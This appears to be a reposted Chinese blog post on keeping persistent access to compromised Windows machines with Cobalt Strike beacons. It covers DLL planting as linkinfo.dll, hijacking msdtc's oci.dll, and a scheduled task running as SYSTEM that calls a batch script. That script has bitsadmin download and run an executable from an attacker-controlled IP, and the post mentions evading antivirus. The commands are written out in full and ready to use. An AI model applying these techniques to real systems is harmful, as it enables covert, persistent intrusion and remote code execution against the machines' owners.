查看原文
其他

Win 权限维持小思路

巡安似海 巡安似海 2022-11-05

0x01 linkinfo.dll

介绍:explorer进程每隔一段时间就会自动去加载它一次所以可以用来做权限维持。使用Cobaltstrike生成对应系统位数DLL文件放置目标系统C:\Windows\目录下重命名为linkinfo.dll
等待目标用户重启计算机后上线,如果系统用户不是Administrator用户需要bypassuac,注意用户一旦注销beacon就会掉

总结:实战里利用略为鸡肋,管理员一般自己是不会重启服务器,自己重启动静太大。
 

0x02 劫持 msdtc

介绍:msdtc程序每次启动时都会加载三个dll,oci.dll默认是不存在的,可以通过劫持这个 dll以达到权限维持目的,位于注册表:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI
使用Cobaltstrike生成木马命名为oci.dll放置目标系统c:\windows\system32\目录下,然后执行cmd命令kill掉:taskkill /f /im msdtc.exe 等待一段时间,mstdc.exe重新启动,成功加载oci.dll,有些文章说重启过后beacon弹回来得用户是system权限,测试发现用户为network权限。

总结:弹回来得权限为network权限较低,所以需要自己进行权限提升

 

0x03 windwos计划任务

介绍:通过计划任务执行bitsadmin 来远程加载执行beacon

准备计划任务执行的bat脚本update.bat,放到目标机器临时目录下c:\windows\temp\delete.bat

[delete.bat]
cd %TEMP
bitsadmin /Reset > NUL
bitsadmin /Create "Automatic App Update" > NUL
bitsadmin /AddFile "Automatic App Update" http://192.168.244.128:83/Update.ini %TEMP%\AppUpdateInstall.exe > NUL
bitsadmin /SetNotifyFlags "Automatic App Update" 1 > NUL
bitsadmin.exe
/SetNotifyCmdLine "Automatic App Update" "%COMSPEC%" "cmd.exe /c
bitsadmin.exe /complete \"Automatic App Update\" && start /B
%TEMP%\AppUpdateInstall.exe" > NUL
bitsadmin /SetMinRetryDelay "Automatic App Update" 120 > NUL
bitsadmin /SetCustomHeaders "Automatic App Update" "Caller:%USERNAME%@%COMPUTERNAME%" > NUL
c:\windows\system32\bitsadmin.exe /Resume "Automatic App Update"

在beacon当中执行计划任务命令当到了指定时间后,baecon即可正常被弹回得到system权限。

[计划任务]

schtasks /create /RL HIGHEST /F /tn "Automatic App Update" /tr "C:\Windows\temp\delete.bat" /sc DAILY /mo 1 /ST 19:05 /RU SYSTEM
schtasks /query | findstr "Automatic App Update"
schtasks /run /tn "Automatic App Update"
schtasks /delete /F /tn "Automatic App Update"

总结:不需要重启服务器,但是国内某些杀软会拦截创建计划任务动作,还需要配合免杀马来执行。

From:https://cnblogs.com/websecyw/p/12561630.html

往期推荐 ●●

// 1

浅谈Web安全从SOP到CORS跨域再到CSP

// 2

记一次智慧校园系统一轮游

// 3

从钓鱼网站到某大厂存储型XSS

// 4

| Burp半自动时间盲注

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存